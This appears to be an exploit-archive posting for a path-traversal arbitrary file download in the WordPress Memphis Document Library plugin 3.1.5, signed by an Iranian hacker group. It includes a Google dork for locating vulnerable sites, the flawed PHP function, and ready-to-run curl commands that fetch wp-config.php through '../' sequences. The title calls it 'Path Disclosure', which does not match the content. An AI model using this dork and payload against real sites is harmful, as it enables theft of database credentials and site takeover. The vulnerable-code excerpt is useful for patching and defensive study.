Home / exploits WordPress Memphis Document Library Plugin 3.1.5 Path Disclosure
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress Memphis Document Library Plugin 3.1.5 Path Disclosure</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: Arbitrary file download in Memphis Document Library 3.1.5 # Google Dork: inurl:"mdocs-posts" -site:wordpress.org # Vendor Homepage: https://wordpress.org # Software Link: https://downloads.wordpress.org/plugin/memphis-documents-library.3.1.5.zip # Version: 3.1.5 (Vulnerable from 2.3 to 3.1.5, fixed in 3.1.6) # Tested on: Ubuntu 12.04, Wordpress 4.4.2. # CVE : N/A # Vulnerable file: memphis-documents-library/mdocs-downloads.php # Vulnerable function: mdocs_img_preview() # Vulnerable GET parameter: Injectable 'mdocs-img-preview' # Vulnerable line: 90 to 93 # Vulnerable code: 87 function mdocs_img_preview() { 88 require_once(ABSPATH . 'wp-includes/pluggable.php'); 89 $upload_dir = wp_upload_dir(); 90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview']; 91 $content = file_get_contents($image); 92 header('Content-Type: image/jpeg'); 93 echo $content; exit(); 94 } # POC: curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php or if the plugin is not installed in the root folder of wordpress, for example in the folder "mdocs-posts": curl http://example.site.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php ################################# [+] We Are Iranian Anonymous Iranonymous.org [+] Discovered By: Hacker Khan ################= [+] Thanks to : MR.Khatar |||| ll_azab-siyah_ll || iran || <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="6c3f042c085c1b">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D [+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous . </BODY></HTML>